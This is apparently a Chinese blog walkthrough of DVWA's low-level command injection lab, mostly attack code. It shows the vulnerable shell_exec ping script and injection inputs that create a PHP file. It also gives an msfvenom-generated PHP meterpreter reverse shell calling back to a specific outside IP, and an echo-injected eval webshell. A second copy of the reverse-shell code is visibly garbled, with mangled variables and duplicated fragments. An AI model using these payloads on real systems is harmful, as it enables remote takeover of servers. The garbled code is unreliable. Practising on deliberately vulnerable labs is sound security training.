DVWA之Command Injection-low

reph0r
332 阅读1分钟

代码:

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
	// Get input
	$target = $_REQUEST[ 'ip' ];

	// Determine OS and execute the ping command.
	if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
		// Windows
		$cmd = shell_exec( 'ping  ' . $target );
	}
	else {
		// *nix
		$cmd = shell_exec( 'ping  -c 4 ' . $target );
	}

	// Feedback for the end user
	$html .= "<pre>{$cmd}</pre>";
}

?>

漏洞利用:

  • Windows平台下: 一.创建PHP文件

127.0.0.1&copy nul shell.php

图片.png 如下图所示:创建成功 图片.png 二.向PHP文件中写入反弹shell代码 首先使用metasploit生成PHP代码

msfvenom -p php/meterpreter/reverse_tcp lhost=8.142.189.231 lport=4444 -o shell.php 反弹shell代码

/*<?php /**/ error_reporting(0); $ip = '8.142.189.231'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

执行命令向PHP文件中写入上述代码

127.0.0.1&echo /*<?php /**/ error_reporting(0); ip=8.142.189.231;ip = '8.142.189.231'; port = 4444; if ((f = 'stream_socket_client') && is_callable(f)) { s=s = f("tcp://{ip}:{port}"); s_type = 'stream'; } if (!s && (f = 'fsockopen') && is_callable(f)) { s=s = f(ip,ip, port); s_type = 'stream'; } if (!s && (f = 'socket_create') && is_callable(f)) { s=s = f(AF_INET, SOCK_STREAM, SOL_TCP); res=@socketconnect(res = @socket_connect(s, ip,ip, port); if (!res)die();res) { die(); } s_type = 'socket'; } if (!stype)die(nosocketfuncs);if(!s_type) { die('no socket funcs'); } if (!s) { die('no socket'); } switch (s_type) { case 'stream': len = fread(s,4);break;casesocket:s, 4); break; case 'socket': len = socket_read(s, 4); break; } if (!len) { die(); } a=unpack("Nlen",a = unpack("Nlen", len); len=len = a['len']; b=;while(strlen(b = ''; while (strlen(b) < len) { switch (s_type) { case 'stream': b.=fread(b .= fread(s, lenstrlen(len-strlen(b)); break; case 'socket': b.=socketread(b .= socket_read(s, lenstrlen(len-strlen(b)); break; } } GLOBALS[msgsock]=GLOBALS['msgsock'] = s; GLOBALS[msgsocktype]=GLOBALS['msgsock_type'] = s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { suhosinbypass=createfunction(,suhosin_bypass=create_function('', b); suhosin_bypass(); } else { eval(b); } die(); >shell.php

注意啊,这样是决对不会写入成功的。因为里面含有特殊字符,需要经过处理!!!(特殊字符前加^) 所以就写一个简单点的,上面那个太多了...

echo ^<?php @eval^($_POST^['test'^]^); ?^> > shell.php

图片.png 所以,大概,应该,写进去了!!!

图片.png

根据这一串优雅的url,我猜路径应该是: www/DVWA/vulnerabilities/exec/shell.php

图片.png 连上了...............

  • Linux平台下:

这个除了配合其他漏洞外,我真不知道该咋利用?

avatar
文章
阅读
粉丝